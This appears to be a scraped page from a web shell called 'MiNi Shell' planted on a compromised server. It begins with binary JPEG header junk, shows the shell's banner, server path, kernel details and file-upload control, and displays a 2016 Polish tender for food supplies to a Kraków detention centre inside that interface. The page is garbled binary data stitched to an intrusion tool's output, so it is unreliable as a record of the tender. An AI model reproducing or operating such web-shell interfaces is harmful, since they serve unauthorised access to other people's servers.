JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160325/69248-N-2016.html

<p class="kh_header"><b>Kraków: Dostawy artykułów spożywczych do Aresztu Śledczego 
w Krakowie  Podgórzu, ul. Czarnieckiego 3</b><br>
<b>Numer ogłoszenia: 69248 - 2016; data zamieszczenia: 25.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Krakowie Podgórzu , ul. Stefana Czarnieckiego 3, 30-536 Kraków, woj. małopolskie, tel. 12 620 50 00, faks 12 4235771.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Aresztu Śledczego 
w Krakowie  Podgórzu, ul. Czarnieckiego 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia w prowadzonym postępowaniu jest:

Grupa I - Produkty ogólnospożywcze

1. Cynamon mielony				kg	    10
2. Herbata granulowana			kg          140
3. Herbata ekspresowa	a 2g			szt       3 000 - ilość torebek do zaparzania 
4. Kakao					kg	    40	            
5. Kawa zbożowa				kg          100        
6. Ketchup pikantny / łagodny			kg	  300 - opakowanie jednostkowe a 5 kg
7. Kminek					kg 	     8
            8. Kwasek cytrynowy				kg	     6
            9.Liść laurowy					kg	    12
           10.Majeranek					kg	     7
           11.Majonez					kg	   100 - opakowanie jedn. a 5 kg
           12.Musztarda					kg	   300 - opakowanie jedn. a 5 kg
           13.Ocet spirytusowy 10%			l	    60 - opakowanie jedn. a 0,5 l
           14.Papryka mielona słodka			kg	    20
           15.Pieprz  naturalny mielony	                       kg           90
           16.Przyprawa do potraw w płynie		l	  840 - opakowanie jedn. a 1 l
           17.Sól jodowana			        	kg	1 000 - opakowanie jedn. a 1000 g
           18.Przyprawa typu VEGETA			kg	    90
           19.Ziele angielskie				kg	    10
           20.Żurek w płynie	      			l	   230
           21.Zupy typu gorący kubek a od 16 do 20g	szt          300
           22.Czosnek granulowany			kg            12
           23.Miód sztuczny				kg	  300
           24.Syrop do napojów				l 	  500 - opakowanie jedn. a 5l
           25.Proszek do pieczenia 			kg           2,5
           26.Cukier wanilinowy 				kg           2,5
	27.woda mineralna 0,5l				l	2 250 - opakowanie jedn. a  0,5 l
           29.Woda mineralna gazowana/niegazowana 	l           2 000 - opakowanie jedn. a 1,5 l
               30.Woda mineralna wysokozmineralizowana	l           2 000 - opakowanie jedn. a 1,5 l
                gazowana/niegazowana

Grupa II  - Cukier

1.Cukier kryształ				kg       1 700 - opakowanie jedn. max a 25 kg
            2.Cukier porcje a 5g				kg	   10 

Grupa III - Produkty zbożowe

             1.Kasza jęczmienna				kg         800 - opakowanie jedn. max a 25 kg
            2.Płatki owsiane				kg	   10 
            3.Kasza manna					kg	  200 - opakowanie jedn. max a 1 kg
            4.Mąka pszenna				kg       1 700 - opakowanie jedn. max a 25 kg
 5. Mąka ziemniaczana				kg	   10 - opakowanie jednostkowe a 1 kg
            6.Ryż długoziarnisty 				kg       1 500 - opakowanie jedn. max a 50 kg
            7.Makaron -  nitki lub galanteria 		kg       1 300 - opakowanie jedn. max a 10 kg

Grupa IV - Przetwory owocowo - warzywne

           1.Groszek konserwowy				kg	  240
           2.Leczo pieczarkowe				kg          550
           3. Kukurydza konserwowa			kg	    40	
           3.Fasolka konserwowa				kg	  200
           4.Dżemy (wiśniowy,truskawkowy,brzoskwiniowy
                           czarna porzeczka)                           kg       1 500 - opakowanie jedn. 5, 10 lub 15 kg
           5.Dżemy porcjowane 25g (smaki jw.)		kg	   25
           6.Marmolada wieloowocowa	  		kg          400 - opakowanie jedn. 5, 10 lub 15 kg
           7.Powidła śliwkowe				kg          400 - opakowanie jedn. 5, 10 lub 15 kg
           8.Chrzan tarty					kg	  130 - opakowanie jedn.  1 kg
           9.Koncentrat pomidorowy 30%			kg	  600 - opakowanie jedn.   1 lub 3 kg
          10.Kotlety sojowe				kg	  200
          11.Pasztety sojowe a 80g lub 100g		kg	   25


Grupa V - Konserwy mięsne

							
	1. Konserwa mięsna typu 	 		kg	360 - opakowanie  jednostkowe 300g                                                         	   (mielonka) a 300g								                                                                                                      
	2. Konserwa mięsna typu			kg        360 - opakowanie  jednostkowe 300g	   (przysmak -śniadaniowy a 300g			   			 	
	3. Konserwa mięsna typu 			kg	360 - opakowanie  jednostkowe 300g   	    (turystyczna) a 300g			
	4. Konserwa mięsna typu 			kg	60 - opakowanie jednostkowe 		   (mielonka) a 100 - 130 g				       w granicach 100 - 130g		5. Konserwa mięsna typu 			kg	80 - opakowanie jednostkowe		   (turystyczna) a 100 - 130 g				         w granicach 100 - 130g
	6. Pasztet drobiowy  				kg	540- opakowanie jednostkowe w 	  	     puszka a 100g - 130g				          w granicach 100 - 130g
                                                                                                  bezdodatków produktów                                                                                          
                                                                                                        pochodzących od zwierząt 									         innych niż drób                                                                                                                 
	7. Pasztet mazowiecki a 300g lub 290g		kg	360 - opakowanie jednostkowe 290 g lub  									300 g									
Grupa VI - Tłuszcze roślinne

1	Margaryna mleczna			kg	300	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 80-90 %
2	Margaryna do smarowania pieczywa	kg	2 400	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 60-62 %
3	Olej uniwersalny			l	950	olej spożywczy, opakowanie
								jednostkowe o gramaturze w
								granicach 1 - 5l
Jeśli w opisie nie wskazano inaczej, zamawiający dopuszcza opakowania według wyboru wykonawcy     z zastrzeżeniem dostarczania produktów w opakowaniach jednostkowych, szczelnych, spełniających wymagania higieny żywności.

II. Opis dodatkowy:
1.Częstotliwość oraz wielkość poszczególnych dostaw uzgadniana będzie z wykonawcą          w przeddzień dostawy. Zamawiający przewiduje realizację dostaw dwa lub trzy  razy  w  miesiącu z wyjątkiem sobót i niedziel. Dostawy realizowane będą loco magazyn Aresztu Śledczego w Krakowie - Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków w godz. 8.00 - 12.00.
2.Dostawy winny być realizowane w opakowaniach oraz transportem wykonawcy na jego koszt. Opakowania oraz środek transportu powinny odpowiadać właściwym przepisom     i normom dotyczącym kontaktu z żywnością. Osoba dostarczająca towar do zamawiającego winna posiadać i okazywać na każde żądanie zamawiającego aktualną książeczkę badań do celów sanitarno - epidemiologicznych ( zaświadczenie lekarskie       z badania przeprowadzonego do celów sanitarno - epidemiologicznych) oraz stosowne atesty producentów w/w artykułów.
3.Dostarczane artykuły winny posiadać zbliżoną gramaturę, jednakowy termin przydatności do spożycia całej dostarczonej partii.
4. Minimalne terminy przydatności dostarczanych produktów  w zakresie grupy V tj. konserw mięsnych oraz w zakresie grupy VI tj. tłuszce roślinne - 60 dni
5.Wymagane opakowanie konserw: puszka stalowa z wieczkiem łatwootwieralnym lub opakowanie typu alupak
6. Pasztet drobiowy puszka 100g - 130g musi być bez dodatków produktów pochodzących od zwierząt innych niż drób
7. Dostarczane produkty z grupy VI - tłuszcze roślinne muszą być zgodne z przepisami rozporządzenia Rady Uni Europejskiej nr 1234/2007 z dnia 22 października 2007r.  ustanawiające wspólną organizację rynków rolnych oraz przepisy szczegółowe dotyczące niektórych produktów rolnych (rozporządzenie  o jednolitej wspólnej organizacji rynku)
8. Dostarczane artykuły muszą być zgodne ze złożonym zamówieniem..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.87.20.00-1, 15.86.30.00-5, 15.86.41.00-3, 15.87.12.30-5, 15.89.10.00-0, 15.87.11.10-8, 15.87.21.00-2, 15.87.24.00-5, 15.83.16.00-8, 15.83.15.00-7, 15.98.10.00-8, 15.83.12.00-4, 15.85.11.00-9, 15.61.33.00-1, 15.61.41.00-6, 15.61.21.00-2, 15.89.00.00-3, 15.33.22.96-5, 15.33.22.94-1, 15.33.22.90-3, 15.33.22.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykonawca dostarczy w/w oświadczenie, w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykonawca dostarczy w/w oświadczenie, w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykonawca dostarczy w/w oświadczenie, w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykonawca dostarczy w/w oświadczenie, w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykonawca dostarczy w/w oświadczenie, w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Krakowie Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2016 godzina 09:00, miejsce: Areszt Śledczy w Krakowie Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 05.05.2016.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cynamon mielony				kg	    10
2. Herbata granulowana			kg          140
3. Herbata ekspresowa	a 2g			szt       3 000 - ilość torebek do zaparzania 
4. Kakao					kg	    40	            
5. Kawa zbożowa				kg          100        
6. Ketchup pikantny / łagodny			kg	  300 - opakowanie jednostkowe a 5 kg
7. Kminek					kg 	     8
            8. Kwasek cytrynowy				kg	     6
            9.Liść laurowy					kg	    12
           10.Majeranek					kg	     7
           11.Majonez					kg	   100 - opakowanie jedn. a 5 kg
           12.Musztarda					kg	   300 - opakowanie jedn. a 5 kg
           13.Ocet spirytusowy 10%			l	    60 - opakowanie jedn. a 0,5 l
           14.Papryka mielona słodka			kg	    20
           15.Pieprz  naturalny mielony	                       kg           90
           16.Przyprawa do potraw w płynie		l	  840 - opakowanie jedn. a 1 l
           17.Sól jodowana			        	kg	1 000 - opakowanie jedn. a 1000 g
           18.Przyprawa typu VEGETA			kg	    90
           19.Ziele angielskie				kg	    10
           20.Żurek w płynie	      			l	   230
           21.Zupy typu gorący kubek a od 16 do 20g	szt          300
           22.Czosnek granulowany			kg            12
           23.Miód sztuczny				kg	  300
           24.Syrop do napojów				l 	  500 - opakowanie jedn. a 5l
           25.Proszek do pieczenia 			kg           2,5
           26.Cukier wanilinowy 				kg           2,5
	27.woda mineralna 0,5l				l	2 250 - opakowanie jedn. a  0,5 l
           29.Woda mineralna gazowana/niegazowana 	l           2 000 - opakowanie jedn. a 1,5 l
               30.Woda mineralna wysokozmineralizowana	l           2 000 - opakowanie jedn. a 1,5 l
                gazowana/niegazowana.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.20.00-1, 15.86.30.00-5, 15.86.41.00-3, 15.87.12.30-5, 15.89.10.00-0, 15.87.11.10-8, 15.87.21.00-2, 15.87.24.00-5, 15.83.16.00-8, 15.83.15.00-7, 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cukier kryształ				kg       1 700 - opakowanie jedn. max a 25 kg
            2.Cukier porcje a 5g				kg	   10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kasza jęczmienna				kg         800 - opakowanie jedn. max a 25 kg
            2.Płatki owsiane				kg	   10 
            3.Kasza manna					kg	  200 - opakowanie jedn. max a 1 kg
            4.Mąka pszenna				kg       1 700 - opakowanie jedn. max a 25 kg
 5. Mąka ziemniaczana				kg	   10 - opakowanie jednostkowe a 1 kg
            6.Ryż długoziarnisty 				kg       1 500 - opakowanie jedn. max a 50 kg
            7.Makaron -  nitki lub galanteria 		kg       1 300 - opakowanie jedn. max a 10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9, 15.61.33.00-1, 15.61.41.00-6, 15.61.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przetwory owocowo - warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Groszek konserwowy				kg	  240
           2.Leczo pieczarkowe				kg          550
           3. Kukurydza konserwowa			kg	    40	
           3.Fasolka konserwowa				kg	  200
           4.Dżemy (wiśniowy,truskawkowy,brzoskwiniowy
                           czarna porzeczka)                           kg       1 500 - opakowanie jedn. 5, 10 lub 15 kg
           5.Dżemy porcjowane 25g (smaki jw.)		kg	   25
           6.Marmolada wieloowocowa	  		kg          400 - opakowanie jedn. 5, 10 lub 15 kg
           7.Powidła śliwkowe				kg          400 - opakowanie jedn. 5, 10 lub 15 kg
           8.Chrzan tarty					kg	  130 - opakowanie jedn.  1 kg
           9.Koncentrat pomidorowy 30%			kg	  600 - opakowanie jedn.   1 lub 3 kg
          10.Kotlety sojowe				kg	  200
          11.Pasztety sojowe a 80g lub 100g		kg	   25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.33.22.96-5, 15.33.22.94-1, 15.33.22.90-3, 15.33.22.30-5, 15.33.14.00-1, 15.33.14.25-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konserwy mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Konserwa mięsna typu 	 		kg	360 - opakowanie  jednostkowe 300g                                                         	   (mielonka) a 300g								                                                                                                      
	2. Konserwa mięsna typu			kg        360 - opakowanie  jednostkowe 300g	   (przysmak -śniadaniowy a 300g			   			 	
	3. Konserwa mięsna typu 			kg	360 - opakowanie  jednostkowe 300g   	    (turystyczna) a 300g			
	4. Konserwa mięsna typu 			kg	60 - opakowanie jednostkowe 		   (mielonka) a 100 - 130 g				       w granicach 100 - 130g		5. Konserwa mięsna typu 			kg	80 - opakowanie jednostkowe		   (turystyczna) a 100 - 130 g				         w granicach 100 - 130g
	6. Pasztet drobiowy  				kg	540- opakowanie jednostkowe w 	  	     puszka a 100g - 130g				          w granicach 100 - 130g
                                                                                                  bezdodatków produktów                                                                                          
                                                                                                        pochodzących od zwierząt 									         innych niż drób                                                                                                                 
	7. Pasztet mazowiecki a 300g lub 290g		kg	360 - opakowanie jednostkowe 290 g lub  									300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.13.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Margaryna mleczna			kg	300	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 80-90 %
2	Margaryna do smarowania pieczywa	kg	2 400	pakowana jednostkowo w kostki 200g
								lub 250g; zawartość tłuszczu w
                                                                                           produkcie w granicach 60-62 %
3	Olej uniwersalny			l	950	olej spożywczy, opakowanie
								jednostkowe o gramaturze w
								granicach 1 - 5l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-9, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com